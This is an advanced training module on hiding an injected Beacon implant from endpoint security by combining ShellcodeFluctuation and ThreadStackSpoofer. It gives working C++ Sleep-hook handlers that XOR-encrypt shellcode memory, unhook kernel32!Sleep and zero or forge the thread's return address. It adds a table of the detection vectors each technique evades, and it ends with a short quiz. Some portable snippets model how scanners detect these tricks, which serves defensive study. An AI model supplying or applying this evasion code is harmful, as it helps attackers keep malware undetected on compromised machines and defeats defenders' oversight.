Difficulty: Advanced

Module 7: Thread Stack Spoofing Integration

Combining ShellcodeFluctuation with ThreadStackSpoofer for dual-layer evasion — encrypted memory AND clean call stacks.

Module Objective

Understand the call stack detection vector that ShellcodeFluctuation alone does not address, how ThreadStackSpoofer (also by mgeeky) overwrites the return address to terminate stack unwinding, how both techniques integrate through their shared Sleep hook architecture, and the combined evasion profile.

1. The Call Stack Detection Vector

Even with ShellcodeFluctuation encrypting memory and removing the Sleep hook during the idle window, a prominent IOC remains: the thread call stack. When a thread is sleeping, its call stack reveals the chain of function calls that led to the sleep:

// Typical call stack of a sleeping Beacon thread WITHOUT stack spoofing:
//
// ntdll!NtDelayExecution          <-- kernel wait
// ntdll!RtlDelayExecution         <-- internal delay
// KERNELBASE!SleepEx              <-- SleepEx wrapper
// kernel32!Sleep                  <-- Sleep API
// 0x000001A0004532                <-- MySleep (in loader memory)
// 0x000001A00023A8                <-- Beacon shellcode (SUSPICIOUS!)
// 0x000001A00001C0                <-- Beacon entry point (SUSPICIOUS!)
// ntdll!RtlUserThreadStart        <-- thread start
//
// Frames 0x1A00... point to private, non-image memory
// This is a strong IOC: legitimate threads have call stacks
// pointing only to loaded DLLs (image-backed memory)

Why This Matters

Security tools like Process Hacker, Moneta, and EDR products can walk thread call stacks using StackWalk64 or RtlVirtualUnwind. Return addresses pointing to private (non-image) memory are strong indicators of injected code. ShellcodeFluctuation encrypts the memory content, but the return addresses on the stack still point to the shellcode allocation's address range.
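To make the check concrete, here is a minimal, portable sketch of the scanner-side logic, not the implementation of any specific tool. `Region`, `isImageBacked`, and `findSuspiciousFrames` are hypothetical names introduced for illustration. A real scanner would fill the region table by querying the target process (for example, the memory type reported by VirtualQueryEx) and take the return addresses from a stack walker instead of hard-coded values.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical model of one memory region, as a scanner might record it
// after querying the target process.
struct Region {
    std::uint64_t base;
    std::uint64_t size;
    bool imageBacked;  // true for mapped DLL/EXE images, false for private memory
};

// Returns true if addr falls inside a region marked as image-backed.
bool isImageBacked(const std::vector<Region>& regions, std::uint64_t addr) {
    for (const Region& r : regions) {
        if (addr >= r.base && addr - r.base < r.size) {
            return r.imageBacked;
        }
    }
    return false;  // unmapped or unknown addresses are treated as suspicious
}

// Collects every return address that does not resolve to image-backed memory.
std::vector<std::uint64_t> findSuspiciousFrames(
        const std::vector<Region>& regions,
        const std::vector<std::uint64_t>& returnAddresses) {
    std::vector<std::uint64_t> suspicious;
    for (std::uint64_t addr : returnAddresses) {
        if (!isImageBacked(regions, addr)) {
            suspicious.push_back(addr);
        }
    }
    return suspicious;
}
```

In this model a single frame in private memory is enough to flag the thread, which is why encrypting the memory contents alone does not remove the indicator.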

2. ThreadStackSpoofer Concept

ThreadStackSpoofer (by mgeeky / Mariusz Banach) addresses the call stack IOC by overwriting the return address that traces back to the shellcode with a null value, effectively terminating the stack walk:

Stack Before vs After Spoofing

Before: the stack shows the full chain: Sleep → MySleep → Beacon

After spoofing: the stack terminates early: Sleep → MySleep → 0x0

The key mechanism is simple: overwrite the return address of the hook handler frame so that stack unwinding cannot reach the shellcode frames below:

// ThreadStackSpoofer core mechanism
void WINAPI MySleep_WithStackSpoof(DWORD dwMilliseconds) {
    // _AddressOfReturnAddress() returns a pointer to the
    // return address stored on the stack for THIS function.
    // This return address points back into the Beacon shellcode.
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();

    // Save the original return address (we need it to get back!)
    const auto origReturnAddress = *overwrite;

    // Overwrite with 0 - stack unwinding will stop here
    *overwrite = 0;

    // ... perform Sleep (stack now looks clean) ...

    // Restore original return address before returning
    *overwrite = origReturnAddress;
}

3. How _AddressOfReturnAddress Works

_AddressOfReturnAddress() is an MSVC compiler intrinsic (declared in <intrin.h>) that returns a pointer to the stack slot holding the current function's return address. This is the value that RET pops when the function returns:

// Stack layout when MySleep is called:
//
// Higher addresses (top of stack diagram)
// +--------------------------+
// | Beacon shellcode frame   |  <-- caller of Sleep
// +--------------------------+
// | Return addr to Beacon    |  <-- THIS is what _AddressOfReturnAddress points to
// +--------------------------+
// | MySleep local variables  |
// +--------------------------+
// | Return addr to MySleep   |  <-- for functions MySleep calls
// +--------------------------+
// | Sleep/SleepEx frame      |
// +--------------------------+
// Lower addresses (bottom of diagram; the stack grows downward)
//
// By overwriting "Return addr to Beacon" with 0:
// Stack walkers see: Sleep -> MySleep -> 0x0 (end)
// They never reach the Beacon frames beyond it

Why Not Overwrite More Frames?

Overwriting a single return address is sufficient because x64 stack walkers (typically built on RtlVirtualUnwind) stop when they encounter a null return address or a frame that cannot be unwound. Zeroing one slot therefore ends the walk, and the caller frames beyond it are never reported to the scanner.
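The termination behavior can be illustrated with a toy model. This is a sketch under simplifying assumptions: the stack is reduced to a list of saved return addresses ordered from the innermost frame outward, and `walkStack` is a hypothetical stand-in for a real walker, which would also consult unwind metadata for each frame.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Toy model of a stack walker: reports return addresses in order and
// stops at the first null entry, treating it as the end of the chain.
std::vector<std::uint64_t> walkStack(
        const std::vector<std::uint64_t>& savedReturns) {
    std::vector<std::uint64_t> reported;
    for (std::uint64_t ret : savedReturns) {
        if (ret == 0) {
            break;  // nothing to look up, so the walk ends here
        }
        reported.push_back(ret);
    }
    return reported;
}
```

With four saved return addresses, zeroing the third leaves only the first two visible to the walker, and writing the saved value back makes all four visible again. The entries after the zeroed slot are untouched in memory; they are simply never visited.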

4. Integrating Both Techniques

ShellcodeFluctuation and ThreadStackSpoofer share the same hook point (kernel32!Sleep) and the same author. Combining them is architecturally straightforward — both sets of operations happen in the same MySleep handler:

void WINAPI MySleep_Combined(DWORD dwMilliseconds) {
    // ========================================
    // STACK SPOOFING: Save and overwrite return address
    // ========================================
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;
    *overwrite = 0;  // Terminate stack walk

    // ========================================
    // FLUCTUATION: Encrypt shellcode memory
    // ========================================
    DWORD oldProt;
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);

    // ========================================
    // UNHOOK: Clean kernel32!Sleep
    // ========================================
    DWORD hookProt;
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.originalBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // SLEEP: Maximum stealth state
    // ========================================
    // At this point:
    //   - Shellcode memory: RW + encrypted (invisible)
    //   - Call stack: terminates at 0 (no shellcode refs)
    //   - kernel32!Sleep: unhooked (clean)
    Sleep(dwMilliseconds);

    // ========================================
    // REHOOK: Reinstall Sleep interception
    // ========================================
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.hookBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // FLUCTUATION: Decrypt shellcode memory
    // ========================================
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);

    // ========================================
    // STACK RESTORE: Put back original return address
    // ========================================
    *overwrite = origReturnAddress;

    // Return to Beacon - execution continues normally
}

5. Dual-Layer Evasion Profile

With both techniques active during the sleep window, the combined profile covers every vector that either technique addresses on its own:

Detection Vector	Fluctuation Only	Stack Spoof Only	Combined
Private executable memory	Evaded (RW during sleep)	Not addressed	Evaded
Shellcode signatures	Evaded (encrypted)	Not addressed	Evaded
Beacon config patterns	Evaded (XOR32)	Not addressed	Evaded
Call stack to private memory	Not addressed	Evaded (return addr = 0)	Evaded
Sleep hook in kernel32	Evaded (unhook during sleep)	Not addressed	Evaded
Thread start address	Not addressed	Not addressed	Not addressed
kernel32 private pages (CoW)	Partially addressed	Not relevant	Partially addressed

Remaining IOCs

Even with both techniques, the thread's start address still points to private memory (the CreateThread target). This is a fundamental IOC that cannot be addressed by post-creation techniques. Solutions include starting the thread on a legitimate DLL function and redirecting via APC, or using thread pool callbacks.

6. Ordering Considerations

The combined approach has specific ordering requirements for the stack spoofing operations:

Operation Order

Spoof stack FIRST — overwrite the return address before any operations that might be observed. A scanner running between steps sees a clean stack from the earliest possible moment
Encrypt shellcode — now the memory content is hidden
Unhook Sleep — remove the last easily-visible IOC
Sleep — in the maximally hidden state
Rehook Sleep — prepare for next cycle
Decrypt shellcode — restore executable content
Restore stack LAST — the return address must be valid for the RET instruction

Restoring the return address must happen last, just before the function returns. If it were restored before decryption, a scanner could briefly see the return address pointing to shellcode memory. If it were never restored, the function would return to address 0 and crash.
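The effect of the ordering can be checked with a small state model. This is a simplified sketch, not a measurement of real scanner behavior: `SleepWindowState`, `Step`, and the helper functions are hypothetical names, and only the three indicators discussed in this module are modeled.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// The three indicators tracked by this model.
struct SleepWindowState {
    bool returnAddressZeroed = false;
    bool shellcodeEncrypted = false;
    bool sleepHooked = true;
};

// Lists which modeled indicators a scanner could observe in this state.
std::vector<std::string> visibleIocs(const SleepWindowState& s) {
    std::vector<std::string> iocs;
    if (!s.returnAddressZeroed) iocs.push_back("stack frame in private memory");
    if (!s.shellcodeEncrypted) iocs.push_back("plaintext shellcode");
    if (s.sleepHooked) iocs.push_back("patched kernel32!Sleep");
    return iocs;
}

enum class Step { SpoofStack, Encrypt, Unhook, Sleep, Rehook, Decrypt, RestoreStack };

// Applies one step of the handler to the modeled state.
void apply(SleepWindowState& s, Step step) {
    switch (step) {
        case Step::SpoofStack:   s.returnAddressZeroed = true;  break;
        case Step::Encrypt:      s.shellcodeEncrypted = true;   break;
        case Step::Unhook:       s.sleepHooked = false;         break;
        case Step::Sleep:        /* state unchanged while waiting */ break;
        case Step::Rehook:       s.sleepHooked = true;          break;
        case Step::Decrypt:      s.shellcodeEncrypted = false;  break;
        case Step::RestoreStack: s.returnAddressZeroed = false; break;
    }
}

// Runs the steps in order and records how many indicators are visible
// after each one.
std::vector<std::size_t> iocCountsAfterEachStep(const std::vector<Step>& order) {
    SleepWindowState state;
    std::vector<std::size_t> counts;
    for (Step step : order) {
        apply(state, step);
        counts.push_back(visibleIocs(state).size());
    }
    return counts;
}
```

For the order listed above, the modeled count falls to zero after the unhook step, stays at zero through the sleep, and returns to three only once the stack is restored. Moving the restore step earlier in the sequence makes the stack indicator visible while other steps are still running.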

7. Advanced Stack Spoofing Considerations

The basic *overwrite = 0 approach has a weakness: a zero return address is itself anomalous. More sophisticated approaches create a fake but plausible call stack:

// Advanced: Spoof with a plausible return address
// Instead of 0, use an address inside a legitimate DLL

void WINAPI MySleep_AdvancedSpoof(DWORD dwMilliseconds) {
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;

    // Option 1: Use a known-good return address
    // e.g., inside ntdll!RtlUserThreadStart
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    FARPROC threadStart = GetProcAddress(hNtdll, "RtlUserThreadStart");
    *overwrite = (ULONG_PTR)threadStart;

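    // Now the stack looks like:
    // Sleep -> MySleep -> RtlUserThreadStart+0x0
    // The frame resolves to a legitimate module, but the address is the
    // function's first byte rather than a post-CALL return site, so
    // validators that inspect call sites can still flag it.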

    // ... fluctuation + sleep ...

    *overwrite = origReturnAddress;
}

// Option 2: Craft a complete fake frame chain
// This requires understanding x64 unwind metadata and
// creating synthetic RUNTIME_FUNCTION entries, which is
// significantly more complex (see SilentMoonwalk, Unwinder)

Call Stack Validation

Modern EDR solutions are becoming more sophisticated at validating call stacks. They may verify that each return address is immediately preceded by a CALL instruction, check unwind metadata consistency, or compare stacks against known-good patterns. Simple spoofing (setting the return address to 0 or to an arbitrary DLL address) may be detected by these checks. Full call stack fabrication (as in SilentMoonwalk) is significantly more complex but more robust.
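The call-site check can be sketched as a byte-pattern heuristic. This is an illustrative simplification, not a description of how any particular product works: `precededByCall` is a hypothetical helper, it covers only the most common x86-64 CALL encodings, and because it matches raw bytes without disassembling, it can produce false positives.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns true if the bytes immediately before `offset` look like a CALL.
// `code` is a copy of the module's bytes; `offset` is the return address
// expressed as an index into that buffer.
bool precededByCall(const std::vector<std::uint8_t>& code, std::size_t offset) {
    if (offset > code.size()) {
        return false;
    }

    // E8 rel32: direct near call, 5 bytes long.
    if (offset >= 5 && code[offset - 5] == 0xE8) {
        return true;
    }

    // FF /2: indirect near call. The ModRM reg field (bits 5..3) must be 2.
    // Common lengths: 2 (no displacement), 3 (disp8), 6 (disp32).
    const std::size_t indirectLengths[] = {2, 3, 6};
    for (std::size_t len : indirectLengths) {
        if (offset >= len && code[offset - len] == 0xFF &&
            ((code[offset - len + 1] >> 3) & 0x7) == 2) {
            return true;
        }
    }
    return false;
}
```

A return address that sits at the first byte of a function has no CALL in front of it within that function, so a check of this kind can flag a spoofed slot that holds an exported function's entry address.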

8. Implementation Notes and Caveats

Practical Considerations

Topic	Details
Compiler optimization	`_AddressOfReturnAddress()` refers to the frame of the function it is compiled into, so the handler must not be inlined into a caller. Mark it `__declspec(noinline)` or disable optimization for it with `#pragma optimize("", off)`. `/Oy-` (do not omit frame pointers) applies only to x86 builds; x64 compilers do not offer it
x64 unwind info	x64 Windows uses table-based unwinding: the walker looks up unwind data for the current instruction pointer, computes the frame size, and reads the saved return address to find the next frame. A return address of 0 gives it nothing to look up, so the walk ends there
Debug builds	Debug builds disable optimization and typically add runtime checks (`/RTC`), so the stack layout differs from Release. Stack spoofing works in both because `_AddressOfReturnAddress()` locates the return slot regardless of layout
Thread count	Both techniques operate per-thread. If the implant spawns worker threads, each thread that calls Sleep will trigger its own fluctuation+spoof cycle
Non-Sleep waits	If the implant uses `WaitForSingleObject` or `WaitForMultipleObjects` instead of `Sleep`, those functions would also need to be hooked for complete coverage

Same Author, Same Architecture

A key advantage of combining ShellcodeFluctuation and ThreadStackSpoofer is that both tools were designed by the same author (mgeeky) with integration in mind. They share the same hooking architecture (inline hook on kernel32!Sleep), the same loader pattern (VirtualAlloc + memcpy + CreateThread), and compatible state management. Merging them into a single MySleep handler is a natural architectural fit.

Knowledge Check

Q1: What detection vector does ThreadStackSpoofer address that ShellcodeFluctuation does not?

A) Executable private memory

B) Thread call stacks showing return addresses in private (non-image) memory

C) RWX page permissions

D) XOR-encrypted memory regions

Q2: How does ThreadStackSpoofer terminate the stack walk?

A) It deletes all stack frames below the current function

B) It hooks RtlVirtualUnwind to skip shellcode frames

C) It moves the thread's stack pointer to a different memory region

D) It overwrites the return address (pointing to shellcode) with 0, causing the unwinder to stop

Q3: Why must the original return address be restored LAST, just before MySleep returns?

A) Windows requires a non-zero return address for thread scheduling

B) The XOR decryption uses the return address as a key

C) The RET instruction needs the valid return address to transfer control back to the shellcode

D) The Sleep API checks the return address for validation
